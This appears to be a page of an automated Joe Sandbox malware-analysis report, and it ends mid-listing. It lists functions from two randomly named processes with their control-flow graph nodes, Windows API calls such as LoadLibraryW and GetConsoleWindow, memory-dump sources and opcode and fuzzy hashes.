                                                                                  control_flow_graph 0 7ff630ce15c0-7ff630ce15fc GetStartupInfoW 1 7ff630ce15ff-7ff630ce160a 0->1 2 7ff630ce160c-7ff630ce160f 1->2 3 7ff630ce1627 1->3 4 7ff630ce1611-7ff630ce1618 2->4 5 7ff630ce161a-7ff630ce1625 Sleep 2->5 6 7ff630ce162c-7ff630ce1634 3->6 4->6 5->1 7 7ff630ce1644-7ff630ce164c 6->7 8 7ff630ce1636-7ff630ce1642 _amsg_exit 6->8 10 7ff630ce16a5 7->10 11 7ff630ce164e-7ff630ce166a 7->11 9 7ff630ce16b0-7ff630ce16b8 8->9 13 7ff630ce16ba-7ff630ce16cd _initterm 9->13 14 7ff630ce16d7-7ff630ce16d9 9->14 12 7ff630ce16ab 10->12 15 7ff630ce166e-7ff630ce1671 11->15 12->9 13->14 16 7ff630ce16e5-7ff630ce16ec 14->16 17 7ff630ce16db-7ff630ce16de 14->17 18 7ff630ce1673-7ff630ce1675 15->18 19 7ff630ce1697-7ff630ce1699 15->19 21 7ff630ce16ee-7ff630ce16fc call 7ff630ce19d0 16->21 22 7ff630ce1718-7ff630ce1725 16->22 17->16 20 7ff630ce169b-7ff630ce16a0 18->20 23 7ff630ce1677-7ff630ce167a 18->23 19->12 19->20 24 7ff630ce1806-7ff630ce1823 20->24 21->22 34 7ff630ce16fe-7ff630ce170e 21->34 28 7ff630ce1731-7ff630ce1736 22->28 29 7ff630ce1727-7ff630ce172c 22->29 26 7ff630ce168c-7ff630ce1695 23->26 27 7ff630ce167c-7ff630ce1688 23->27 26->15 27->26 30 7ff630ce173a-7ff630ce1741 28->30 29->24 32 7ff630ce1743-7ff630ce1746 30->32 33 7ff630ce17b7-7ff630ce17bb 30->33 36 7ff630ce174c-7ff630ce1752 32->36 37 7ff630ce1748-7ff630ce174a 32->37 38 7ff630ce17cb-7ff630ce17d4 33->38 39 7ff630ce17bd-7ff630ce17c7 33->39 34->22 40 7ff630ce1762-7ff630ce1796 call 7ff630ce109c 36->40 41 7ff630ce1754-7ff630ce1760 36->41 37->33 37->36 38->30 39->38 44 7ff630ce17a0-7ff630ce17a7 40->44 45 7ff630ce1798-7ff630ce179a exit 40->45 41->36 46 7ff630ce17b5 44->46 47 7ff630ce17a9-7ff630ce17af _cexit 44->47 45->44 46->24 47->46
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1691499035.00007FF630CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF630CE0000, based on PE: true
                                                                                  • Associated: 00000001.00000002.1691474359.00007FF630CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.1691517630.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.1691539369.00007FF630CE4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.1691539369.00007FF630CE9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_7ff630ce0000_rKPaQokQ.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_cexit_inittermexit
                                                                                  • String ID:
                                                                                  • API String ID: 642454821-0
                                                                                  • Opcode ID: c6359c6e4283e84ba6e32f8d3b42f24606ddad3b2f0fda16ee4a83a3ea6b4827
                                                                                  • Instruction ID: 850917fc1d605781a93d32662802a44701f065b83b48a82c4bb35652d1a9c4ca
                                                                                  • Opcode Fuzzy Hash: c6359c6e4283e84ba6e32f8d3b42f24606ddad3b2f0fda16ee4a83a3ea6b4827
                                                                                  • Instruction Fuzzy Hash: 27616B36A09642A2FB208F18E84267972B5FF44B5AF542035EE4DC7390DF3CE969E704
                                                                                  Function 00007FF630CE109C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 76COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1691499035.00007FF630CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF630CE0000, based on PE: true
                                                                                  • Associated: 00000001.00000002.1691474359.00007FF630CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.1691517630.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.1691539369.00007FF630CE4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.1691539369.00007FF630CE9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_7ff630ce0000_rKPaQokQ.jbxd
                                                                                  Similarity
                                                                                  • API ID: Event$ExecuteInformationRegisterShellTransferWrite
                                                                                  • String ID: CalculatorStarted$calculator://
                                                                                  • API String ID: 2334100579-3358960933
                                                                                  • Opcode ID: da07b945c66d87172fb6d385bc7f783503ffd44cdd0073e952ce876dff7d5c78
                                                                                  • Instruction ID: 3fe573d3ef98569c30ab54ed131b9b2eaf1845c5a995e2edb719cb186f6dee1e
                                                                                  • Opcode Fuzzy Hash: da07b945c66d87172fb6d385bc7f783503ffd44cdd0073e952ce876dff7d5c78
                                                                                  • Instruction Fuzzy Hash: CB41F372A08B06A9E7108F20E8467A937B0FF4874EF406136DA4D86764EF7CE25CE744
                                                                                  Function 00007FF630CE1570 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 57 7ff630ce1570-7ff630ce15b8 __wgetmainargs
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1691499035.00007FF630CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF630CE0000, based on PE: true
                                                                                  • Associated: 00000001.00000002.1691474359.00007FF630CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.1691517630.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.1691539369.00007FF630CE4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.1691539369.00007FF630CE9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_7ff630ce0000_rKPaQokQ.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wgetmainargs
                                                                                  • String ID:
                                                                                  • API String ID: 1709950718-0
                                                                                  • Opcode ID: f3c7ffe37119d5960e29bac784ee999e60dd8015e82a87bdc8af8edc20cfebb1
                                                                                  • Instruction ID: 357dba381cafa47b8b50b4a03c884faeb6fd39c8ec75a2843c94d8555da9948b
                                                                                  • Opcode Fuzzy Hash: f3c7ffe37119d5960e29bac784ee999e60dd8015e82a87bdc8af8edc20cfebb1
                                                                                  • Instruction Fuzzy Hash: 1CE05274E0A647BAEA118B11A84B5A137B4BF5430EB803032C40C97360DF3CB10DEF08

                                                                                  Non-executed Functions

                                                                                  Function 00007FF630CE1240 Relevance: 10.6, APIs: 7, Instructions: 64COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1691499035.00007FF630CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF630CE0000, based on PE: true
                                                                                  • Associated: 00000001.00000002.1691474359.00007FF630CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.1691517630.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.1691539369.00007FF630CE4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.1691539369.00007FF630CE9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_7ff630ce0000_rKPaQokQ.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 3266983031-0
                                                                                  • Opcode ID: 3f4a8eccdaacee45f95532b3a06a74df7695b770c7f1d0e3a0e2c0ef18d089ea
                                                                                  • Instruction ID: b48826922af19ce2fc003152a2d7150c94a4de9dee19154a122d11f6e8fd32d9
                                                                                  • Opcode Fuzzy Hash: 3f4a8eccdaacee45f95532b3a06a74df7695b770c7f1d0e3a0e2c0ef18d089ea
                                                                                  • Instruction Fuzzy Hash: A231D735A08B46A1EB108B14F88A369B7B4FF8574AF502039DA8D82764DF7CE55CE704
                                                                                  Function 00007FF630CE1264 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.1691499035.00007FF630CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF630CE0000, based on PE: true
                                                                                  • Associated: 00000001.00000002.1691474359.00007FF630CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.1691517630.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.1691539369.00007FF630CE4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.1691539369.00007FF630CE9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_7ff630ce0000_rKPaQokQ.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                  • String ID:
                                                                                  • API String ID: 4104442557-0
                                                                                  • Opcode ID: 6d05e97ad7152ad940533a717775fd3e471bf463976c5954689ff5dc2ea8ee6c
                                                                                  • Instruction ID: b0ba24ba15912e500a02b239d4444c5afd4492bd5e40c0cca26291fe9118bfff
                                                                                  • Opcode Fuzzy Hash: 6d05e97ad7152ad940533a717775fd3e471bf463976c5954689ff5dc2ea8ee6c
                                                                                  • Instruction Fuzzy Hash: 68111D32604B819AEB10CF70EC561A933B4FF4875DB452A35EA6E82754DF3CDAA8C240

                                                                                  Execution Graph

                                                                                  Execution Coverage:13.3%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:40
                                                                                  Total number of Limit Nodes:2
                                                                                  execution_graph 30189 65463c1 30190 654635c 30189->30190 30191 65463ca 30189->30191 30196 6547460 30190->30196 30200 6547451 30190->30200 30204 65473f0 30190->30204 30192 654637d 30197 65474a8 30196->30197 30198 65474b1 30197->30198 30208 654712c 30197->30208 30198->30192 30202 65473ed 30200->30202 30201 65474b1 30201->30192 30202->30200 30202->30201 30203 654712c LoadLibraryW 30202->30203 30203->30201 30205 65473ed 30204->30205 30205->30204 30206 65474b1 30205->30206 30207 654712c LoadLibraryW 30205->30207 30206->30192 30207->30206 30209 6547650 LoadLibraryW 30208->30209 30211 65476c5 30209->30211 30211->30198 30212 12e0871 30217 12e08c8 30212->30217 30222 12e0817 30212->30222 30228 12e08d8 30212->30228 30213 12e0889 30218 12e08d8 30217->30218 30233 12e0ce8 30218->30233 30237 12e0ce0 30218->30237 30219 12e093e 30219->30213 30223 12e081d 30222->30223 30224 12e0897 30223->30224 30226 12e0ce8 GetConsoleWindow 30223->30226 30227 12e0ce0 GetConsoleWindow 30223->30227 30224->30213 30225 12e093e 30225->30213 30226->30225 30227->30225 30229 12e08fa 30228->30229 30231 12e0ce8 GetConsoleWindow 30229->30231 30232 12e0ce0 GetConsoleWindow 30229->30232 30230 12e093e 30230->30213 30231->30230 30232->30230 30234 12e0d26 GetConsoleWindow 30233->30234 30236 12e0d56 30234->30236 30236->30219 30238 12e0ce8 GetConsoleWindow 30237->30238 30240 12e0d56 30238->30240 30240->30219

                                                                                  Executed Functions

                                                                                  Function 065904F4 Relevance: 1.7, Strings: 1, Instructions: 499COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1871087953.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6590000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: P
                                                                                  • API String ID: 0-3110715001
                                                                                  • Opcode ID: 54e79eb0378ac23e3ae905b0084d0d4d34ca200d213da1d5817c775e9c62c9ab
                                                                                  • Instruction ID: 4b9300959d3f121f659c87d81ddf3fba11eabaab4c1c985d2ca57237aeddb743
                                                                                  • Opcode Fuzzy Hash: 54e79eb0378ac23e3ae905b0084d0d4d34ca200d213da1d5817c775e9c62c9ab
                                                                                  • Instruction Fuzzy Hash: E81269307506248FCF14EFA8C550A6EBBB2FF85705F10895CD5029F7A5CB75E90A8B91
                                                                                  Function 06547648 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E58,?,?,06547506), ref: 065476B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1870738059.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6540000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 6dfe23526faeeca4b762995cb2fcaec03367b1e9d2c5f9a6f751b7f0b02eeed1
                                                                                  • Instruction ID: 21d0cc6bdc23cb34c0d488fe6a025d5d28c85b206dfe317db774e6265d2c104f
                                                                                  • Opcode Fuzzy Hash: 6dfe23526faeeca4b762995cb2fcaec03367b1e9d2c5f9a6f751b7f0b02eeed1
                                                                                  • Instruction Fuzzy Hash: CB1142B6C002498FCB10DF9AC944ACEFBF5AB88324F14842AD418A7320C374A546CFA5
                                                                                  Function 0654712C Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E58,?,?,06547506), ref: 065476B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1870738059.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6540000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 8104b196af2cfbd660d3ef69b6d89ab42d32d585b7334f5c789cf2b81f814612
                                                                                  • Instruction ID: 6fabe98d99fcf039152bfdbc03ab3826b9eea004e72ad8645b9cd1115e64f99b
                                                                                  • Opcode Fuzzy Hash: 8104b196af2cfbd660d3ef69b6d89ab42d32d585b7334f5c789cf2b81f814612
                                                                                  • Instruction Fuzzy Hash: 961123B1D002498FDB10DFAAC844ADEFBF5EB89324F14886AD419B7210C375A545CFA4
                                                                                  Function 012E0CE0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1818495391.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_12e0000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConsoleWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2863861424-0
                                                                                  • Opcode ID: 590935de4c25bc95f6edc635f2b297e6590ec7282bd60af567efb10605e5a0b0
                                                                                  • Instruction ID: 15092ebddda113f4cd5a089401138b5dd8eb53ac869ccaccd4d071de754c2b3f
                                                                                  • Opcode Fuzzy Hash: 590935de4c25bc95f6edc635f2b297e6590ec7282bd60af567efb10605e5a0b0
                                                                                  • Instruction Fuzzy Hash: 8A1146B1900349CFDB24DFAAC4497DEBBF4EB88324F208829D559A7250C7756945CBA4
                                                                                  Function 012E0CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1818495391.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_12e0000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConsoleWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2863861424-0
                                                                                  • Opcode ID: a0b8970767c58993ead8e48a006a1e6fb4c34ac11c706fd94d3973ade75f5707
                                                                                  • Instruction ID: 7ed6d856a8276604469d22ce47b17e2efff2f6951fe4ba19bc3392c083f7e8e4
                                                                                  • Opcode Fuzzy Hash: a0b8970767c58993ead8e48a006a1e6fb4c34ac11c706fd94d3973ade75f5707
                                                                                  • Instruction Fuzzy Hash: 691136B1D002498FDB24DFAAC4457DEFFF4EB88324F208819D559A7250CB79A544CBA4
                                                                                  Function 06591550 Relevance: 1.4, Instructions: 1414COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1871087953.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6590000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 19e12ed8ddfa8760d495fd6deed2476c36d8b2818b851f64f3f055d167a09311
                                                                                  • Instruction ID: ca67c9c31d00859e46953c8305047d0c13d8cc997a6e18dbf8e1a9a00c854ede
                                                                                  • Opcode Fuzzy Hash: 19e12ed8ddfa8760d495fd6deed2476c36d8b2818b851f64f3f055d167a09311
                                                                                  • Instruction Fuzzy Hash: CEC23C34B502189FCF15DB58CD90EADBBB6BF88700F50809AE50AAB365DB31AD45CF61
                                                                                  Function 0659349D Relevance: 1.3, Instructions: 1277COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1871087953.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6590000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f491476c22117c9a7af49fc8572cd2d4d64fc2b2685459fddfce1b10fd66ff14
                                                                                  • Instruction ID: f80a3ef4b2d05017a1a059f04d931477ba2d6fb6612e55d9a7c26fcacb246b26
                                                                                  • Opcode Fuzzy Hash: f491476c22117c9a7af49fc8572cd2d4d64fc2b2685459fddfce1b10fd66ff14
                                                                                  • Instruction Fuzzy Hash: 9EA16974B10245DFCF44DB68C994E6EBBF2FF89600B14846AE5169B3A1CB35DC05CBA1
                                                                                  Function 06590048 Relevance: .7, Instructions: 664COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1871087953.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6590000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 21ee6d669c1d508e48b1e66f2af55be98b1a322533ba9fac7ef481fd0ad52ba0
                                                                                  • Instruction ID: fed28309191d39bbdb2c87962e212e3a0cc5bfab5bd9e93fb7e6c3dd5988f6af
                                                                                  • Opcode Fuzzy Hash: 21ee6d669c1d508e48b1e66f2af55be98b1a322533ba9fac7ef481fd0ad52ba0
                                                                                  • Instruction Fuzzy Hash: B0427B307506258FCB24EFA8D55096EBBF2FFC5705B10895CD4029F7A4CB7AE80A8B95
                                                                                  Function 0659056A Relevance: .5, Instructions: 464COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1871087953.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6590000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1c5440707a0696f7aef71feb7dc61afbbf03121bc05e59bb64222e437ef01dc4
                                                                                  • Instruction ID: 09653e284d628e71b462cf29b7b8e60dadb75bf9e4613838d64b462b11019efa
                                                                                  • Opcode Fuzzy Hash: 1c5440707a0696f7aef71feb7dc61afbbf03121bc05e59bb64222e437ef01dc4
                                                                                  • Instruction Fuzzy Hash: 29026A30B506148FCF14EFA8C950A6EBBB2FF85705F10895CD5029F3A5CB75E94A8B91
                                                                                  Function 065905E0 Relevance: .4, Instructions: 427COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1871087953.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6590000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 456398094676be86cb35b56a2f684c1f9ae327bb1d7b8dd3fb95942f99a04373
                                                                                  • Instruction ID: b3d5e43a57a5c8737bfad4058faa129c863fbd808d6a72a7764bb6e82189164f
                                                                                  • Opcode Fuzzy Hash: 456398094676be86cb35b56a2f684c1f9ae327bb1d7b8dd3fb95942f99a04373
                                                                                  • Instruction Fuzzy Hash: 71026930B502148FDF10DFA8C950A6EBBB2FF85704F10899DD5029F3A5CB76E94A8B91
                                                                                  Function 06590656 Relevance: .4, Instructions: 389COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1871087953.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6590000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a12affb0761855e3c4575fc70ce9aa1ad7a08d154b2140e1a2b2a760327c4532
                                                                                  • Instruction ID: d4610693e918f5529766f8e193f28639d7e6107d55a489dd300283ebea1a67ec
                                                                                  • Opcode Fuzzy Hash: a12affb0761855e3c4575fc70ce9aa1ad7a08d154b2140e1a2b2a760327c4532
                                                                                  • Instruction Fuzzy Hash: 4DF18B30B502149FDF10DFA8C944A6EBBB2FF85704F108899E5029F3A5CB75E94A8F91
                                                                                  Function 065906CC Relevance: .4, Instructions: 355COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1871087953.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6590000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 57cfc69d419435cdc9f5fcbd925c3d17279428d17438a0ebf6f4288568f6d10a
                                                                                  • Instruction ID: c09c98dae50efa85843c240a5faf24d9b2c1a37beb1249ddf072eac07e1d105b
                                                                                  • Opcode Fuzzy Hash: 57cfc69d419435cdc9f5fcbd925c3d17279428d17438a0ebf6f4288568f6d10a
                                                                                  • Instruction Fuzzy Hash: 46E17B30B502189FDF00DFA8C954A6EBBB6FF85704F108859E5029F3A5CB76D9468FA1
                                                                                  Function 06590000 Relevance: .4, Instructions: 352COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1871087953.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6590000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f4602ac75a42431cee59df1ef92eb60868fd59aec1365ac5f2e92874bacfdb69
                                                                                  • Instruction ID: 70498a292c472b1c987170449967e14d9b43dcb3cfe6f91c5c4a1dad198e934d
                                                                                  • Opcode Fuzzy Hash: f4602ac75a42431cee59df1ef92eb60868fd59aec1365ac5f2e92874bacfdb69
                                                                                  • Instruction Fuzzy Hash: B8D1AD30B012049FDF04DFA8C955A6ABBB6FF89704F10849AE5018F3A6DB71D846CFA1
                                                                                  Function 06591308 Relevance: .2, Instructions: 204COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1871087953.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6590000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 04dfbe231f70e93cd5ae0cb8f34569f4f1ab20b1a8e7cfd30601d0a4c5be864d
                                                                                  • Instruction ID: 12170a9cd6fbb35750b624face36beaf417a3fb8d66f93ee6fec6c83472b8800
                                                                                  • Opcode Fuzzy Hash: 04dfbe231f70e93cd5ae0cb8f34569f4f1ab20b1a8e7cfd30601d0a4c5be864d
                                                                                  • Instruction Fuzzy Hash: 04513531B00B268FCF649E7AD84047ABBF6BFC5250B14857AE949CB211EB31C944CBB1
                                                                                  Function 0659338B Relevance: .1, Instructions: 78COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1871087953.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6590000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 94d759941adfab8231cf25425744e31e213a9e5739ed0a39d0b24439e537e42c
                                                                                  • Instruction ID: c07292726b8dddf271d3ab96b2a1dee725e93bff0e3f9245b7722a431ea052eb
                                                                                  • Opcode Fuzzy Hash: 94d759941adfab8231cf25425744e31e213a9e5739ed0a39d0b24439e537e42c
                                                                                  • Instruction Fuzzy Hash: 99212A35B80004AFCF54DF69C984EA9BBB2FF88714F5580A9E9059F365DA31EC05CB60
                                                                                  Function 0128D054 Relevance: .1, Instructions: 77COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1817560559.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_128d000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cef19fe0887b96e608f047d4f27151e81eb0ffc4d34d503e74ded11bd948ccbd
                                                                                  • Instruction ID: 089c3d70a74c1816d95cbf45a9969d0a83deaa5a8256508fe82b7f6388d018f9
                                                                                  • Opcode Fuzzy Hash: cef19fe0887b96e608f047d4f27151e81eb0ffc4d34d503e74ded11bd948ccbd
                                                                                  • Instruction Fuzzy Hash: 65212471510244DFCF05EF54D9C0B26BFA5FB88314F24C269EA080A2D6C37AD41ACBA1
                                                                                  Function 0129D4A4 Relevance: .1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.1817700531.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_129d000_wjoqZlIS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: da9a3227ac12e1b11b23e4f33431f11be3c203058784332bf36cea1493745559
                                                                                  • Instruction ID: 3f4e53588764f120624b3a15da4466a88b7c5b35f59a90dfe60626f326e3d00b
                                                                                  • Opcode Fuzzy Hash: da9a3227ac12e1b11b23e4f33431f11be3c203058784332bf36cea1493745559
                                                                                  • Instruction Fuzzy Hash: DB2134B1510208DFCF01CF5CE9C0B26BBA1FB84318F20C56DDA094B252C77AE446DB61
                                                                                  Function 0129D2F4 Relevance: .1, Instructions: 72COMMON
                                                                                  Download Yara Rule
